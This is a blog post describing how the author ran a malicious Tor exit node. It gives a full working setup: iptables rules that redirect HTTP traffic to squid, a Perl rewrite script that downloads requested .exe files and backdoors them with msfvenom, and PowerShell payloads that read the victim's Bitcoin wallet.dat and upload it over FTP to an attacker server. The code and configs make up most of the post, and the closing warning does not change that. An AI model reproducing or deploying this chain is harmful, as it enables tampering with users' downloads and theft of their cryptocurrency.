Posts From dirty Tor exit nodes to Bitcoin wallet.dat theft
Post
Cancel

From dirty Tor exit nodes to Bitcoin wallet.dat theft

Background

While living at a halfway house, otherwise bored of being sober at the time, I decided I was going to run a Tor exit node. The neat thing about Tor exit nodes is, if you are an operator, you control any and all data that passes through your node, with the ability to packet sniff, or even inject foreign code into unencrypted data streams.

How I did it

Some of this would need to be tweaked to your specific use case scenario and server setup, but the basic idea is to take data coming from the tor server connecting to HTTP port 80, and reroute that traffic to a squid proxy that runs msfvenom on any exe attempted to be downloaded over the node, tagging the Windows PE executable with your own hot-patched binary. Basically this means that the useage of the exe will be the same for the user, but run your function code, say, on exit.

The perl code that does the actual patching:

#!/usr/bin/perl
$|++;
$count = 0;
$pid   = $$;
while (<>) {
    chomp $_;
    my @parts = split;
    my $url = @parts[0];
    if ( $url =~ /.*\.exe$/i ) {
        system( "/usr/bin/wget -q -O /var/www/html/patchit/a-$count.exe $url > /dev/null" );
        system(" ./msfvenom -k -x a-$count.exe -f exe --payload windows/exec --platform windows CMD=\"powershell -c $uploadFile=\"C:\%appdata%\Bitcoin\wallet.dat\";$rand = Get-Random -Maximum 10000;$linkFTP=\"ftp://user:pass@IP/wallet.$rand.dat\"; $client=New-Object -TypeName System.Net.WebClient; $URI=New-Object -TypeName System.Uri -ArgumentList $ftp; $client.UploadFile($URI,$uploadFile)\" -o f.exe -i 2 -e x86/shikata_ga_nai -a x86");
        # cavet, this only works right with x86 .exe's right now
        system(" chmod a+rw /var/www/html/patchit/*.exe");
     system("echo 'Patched: $url' >> /tmp/urls.log");
     print ( "http://127.0.0.1:80/f.exe\n" );
    }
    else {
      print "$url\n";
  }
  $count++;
}

Is called by a squid proxy with the following configuration:

visible_hostname 127.0.0.1
#acl local src 127.0.0.1
#http_access allow local
http_access allow all
#http_port 127.0.0.1:3128 intercept vhost allow-direct
http_port 3128 intercept
url_rewrite_program /tmp/frankenpatch.pl

Which is called to action when tor attempts to make a connection to a exe download page over HTTP. This is accomplished through some iptables rerouting magic (take note of stuff leaving the tor program’s uid 109 and rerouting it form dstip:80 to our squid proxy sitting on 127.0.0.1:3128:

# Generated by iptables-save v1.4.21 on Sun Sep 22 17:39:18 2019
*nat
:PREROUTING ACCEPT [17:908]
:POSTROUTING ACCEPT [379:22945]
:OUTPUT ACCEPT [197:12025]
-A OUTPUT -p tcp -m tcp --dport 80 -m owner --uid-owner 109 -j DNAT --to-destination 127.0.0.1:3128
COMMIT
# Completed on Sun Sep 22 17:39:18 2019
# Generated by iptables-save v1.4.21 on Sun Sep 22 17:39:18 2019
*mangle
:PREROUTING ACCEPT [20929:17905684]
:INPUT ACCEPT [20929:17905684]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [22075:17054611]
:POSTROUTING ACCEPT [22075:17054611]
COMMIT
# Completed on Sun Sep 22 17:39:18 2019
# Generated by iptables-save v1.4.21 on Sun Sep 22 17:39:18 2019
*filter
:INPUT ACCEPT [201:11864]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [22075:17054611]
-A INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 3128 -j ACCEPT
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -m conntrack --ctstate NEW,ESTABLISHED -m comment --comment "SSH Inbound" -j ACCEPT
-A INPUT -p tcp -m tcp --dport 9001 -m conntrack --ctstate NEW,ESTABLISHED -m comment --comment TOR -j ACCEPT
COMMIT
# Completed on Sun Sep 22 17:39:18 2019
# Generated by iptables-save v1.4.21 on Sun Sep 22 17:39:18 2019
*raw
:PREROUTING ACCEPT [20929:17905684]
:OUTPUT ACCEPT [22075:17054611]
COMMIT
# Completed on Sun Sep 22 17:39:18 2019

Concerning Tor itself, it’s importnat to note that you reject all traffic other than port 80 or you’ll just run your bill up forwarding traffic that you can’t patch. The torrc file below which tells tor how to start up:

ORPort 9001
Nickname [redacted]
ContactInfo oxagast oxagast@[redacted]
#ExitRelay 1
ExitPolicyRejectPrivate 0
ClientRejectInternalAddresses 0
ExitPolicy accept *:80,reject *:*
RelayBandwidthRate 180 KBytes

For good measure, I’m going to include my apache2 server config below:

DefaultRuntimeDir ${APACHE_RUN_DIR}
PidFile ${APACHE_PID_FILE}
Timeout 300
KeepAlive On
MaxKeepAliveRequests 100
KeepAliveTimeout 5
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
HostnameLookups Off
ErrorLog ${APACHE_LOG_DIR}/error.log
LogLevel warn
IncludeOptional mods-enabled/*.load
IncludeOptional mods-enabled/*.conf
Include ports.conf
<Directory />
        Options FollowSymLinks
        AllowOverride None
        Require all denied
</Directory>
<Directory /usr/share>
        AllowOverride None
        Require all granted
</Directory>
<Directory /var/www/html>
        Options Indexes FollowSymLinks
        AllowOverride None
        Require all granted
</Directory>
AccessFileName .htaccess
<FilesMatch "^\.ht">
        Require all denied
</FilesMatch>
LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %O" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent
IncludeOptional conf-enabled/*.conf
IncludeOptional sites-enabled/*.conf

Now finally, the code that gets tagged onto the patchable executable:

./msfvenom -k -x a-4802.exe -f exe --payload windows/exec --platform windows CMD='$randn = Get-Random -Maximum 10000;$ftp = [System.Net.FtpWebRequest]::Create("ftp://example.com/wallets/wallet-$randn.dat");$ftp = [System.Net.FtpWebRequest]$ftp;$ftp.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile;$ftp.Credentials = new-object System.Net.NetworkCredential("btc","keygoeshere");$ftp.UseBinary = $true;$ftp.UsePassive = $false;$ad = $env:APPDATA;$content = [System.IO.File]::ReadAllBytes("$ad\Bitcoin\wallets\wallet\wallet.dat");$ftp.ContentLength = $content.Length;$rs = $ftp.GetRequestStream();$rs.Write($content, 0, $content.Length);$rs.Close();$rs.Dispose();' -o f.exe -i 2 -e x86/shikata_ga_nai -a x86

This last bit of code uploads the users bitcoin wallet.dat to a FTP server of your choosing.

What it looks like in action

This is particularly nasty code and I do not recommend running any of this on your own ever. It is most probably against some local and federal laws.

Be safe, and hope you enjoyed reading!

This post is licensed under CC BY 4.0 by the author.